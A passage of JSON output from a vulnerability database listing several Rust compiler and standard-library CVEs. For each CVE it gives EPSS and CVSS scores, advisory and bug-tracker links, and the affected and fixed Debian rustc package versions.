"reference_type": "", "scores": [ { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.5542", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55497", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55505", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55522", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55531", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55557", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55533", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55585", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55587", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55596", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55576", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55558", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55595", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55598", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55577", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-29922" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29922", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29922" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1991962", "reference_id": "1991962", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1991962" }, { "reference_url": "https://security.archlinux.org/AVG-2263", "reference_id": "AVG-2263", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-2263" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4270", "reference_id": "RHSA-2021:4270", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4270" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938936?format=api", "purl": "pkg:deb/debian/rustc@1.53.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.53.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2021-29922" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f4bw-5erp-4uc6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31470?format=api", "vulnerability_id": "VCID-fu46-5dhv-ckdt", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28877.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28877.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28877", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50792", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5083", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50862", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5087", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50847", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50873", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50831", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50888", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50886", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50928", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50907", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5089", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50934", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50914", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28877" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28877", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28877" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949204", "reference_id": "1949204", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949204" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1802", "reference_id": "AVG-1802", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1802" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938936?format=api", "purl": "pkg:deb/debian/rustc@1.53.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.53.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2021-28877" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fu46-5dhv-ckdt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/67220?format=api", "vulnerability_id": "VCID-g6ey-xfpk-ayck", "summary": "rust: Rust standard library didn't detect all path separators on Cygwin", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-11233.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-11233.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-11233", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.37191", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.37114", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.37063", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.37109", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.37091", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.37035", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.36801", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.36769", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.37219", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.3705", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.37102", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.37124", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00162", "scoring_system": "epss", "scoring_elements": "0.3709", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00174", "scoring_system": "epss", "scoring_elements": "0.38431", "published_at": "2026-04-29T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-11233" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/rust-lang/rust/pull/141864", "reference_id": "141864", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/AU:Y/RE:L/U:Green" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-01T17:21:57Z/" } ], "url": "https://github.com/rust-lang/rust/pull/141864" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400867", "reference_id": "2400867", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400867" }, { "reference_url": "https://groups.google.com/g/rustlang-security-announcements/c/oT9zCvLLYkw", "reference_id": "oT9zCvLLYkw", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/AU:Y/RE:L/U:Green" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-01T17:21:57Z/" } ], "url": "https://groups.google.com/g/rustlang-security-announcements/c/oT9zCvLLYkw" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7288", "reference_id": "RHSA-2026:7288", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7288" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938935?format=api", "purl": "pkg:deb/debian/rustc@0?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@0%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938938?format=api", "purl": "pkg:deb/debian/rustc@1.89.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.89.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2025-11233" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g6ey-xfpk-ayck" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31479?format=api", "vulnerability_id": "VCID-j9kg-rd4y-y7by", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-21658.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-21658.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-21658", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.7552", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.7555", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.75582", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.75589", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.75608", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.75583", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.75572", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.7553", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75793", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75817", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75778", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75789", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75834", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75823", "published_at": "2026-04-26T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-21658" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21658", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21658" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2041504", "reference_id": "2041504", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2041504" }, { "reference_url": "https://github.com/rust-lang/rust/pull/93110/commits/32ed6e599bb4722efefd78bbc9cd7ec4613cb946", "reference_id": "32ed6e599bb4722efefd78bbc9cd7ec4613cb946", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://github.com/rust-lang/rust/pull/93110/commits/32ed6e599bb4722efefd78bbc9cd7ec4613cb946" }, { "reference_url": "https://github.com/rust-lang/rust/pull/93110/commits/406cc071d6cfdfdb678bf3d83d766851de95abaf", "reference_id": "406cc071d6cfdfdb678bf3d83d766851de95abaf", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://github.com/rust-lang/rust/pull/93110/commits/406cc071d6cfdfdb678bf3d83d766851de95abaf" }, { "reference_url": "https://github.com/rust-lang/rust/pull/93110/commits/4f0ad1c92ca08da6e8dc17838070975762f59714", "reference_id": "4f0ad1c92ca08da6e8dc17838070975762f59714", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://github.com/rust-lang/rust/pull/93110/commits/4f0ad1c92ca08da6e8dc17838070975762f59714" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW/", "reference_id": "7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW/" }, { "reference_url": "https://github.com/rust-lang/rust/pull/93110", "reference_id": "93110", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://github.com/rust-lang/rust/pull/93110" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX/", "reference_id": "BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ/", "reference_id": "C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CKGTACKMKAPRDPWPTU26GYWBELIRFF5N/", "reference_id": "CKGTACKMKAPRDPWPTU26GYWBELIRFF5N", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CKGTACKMKAPRDPWPTU26GYWBELIRFF5N/" }, { "reference_url": "https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html", "reference_id": "cve-2022-21658.html", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": 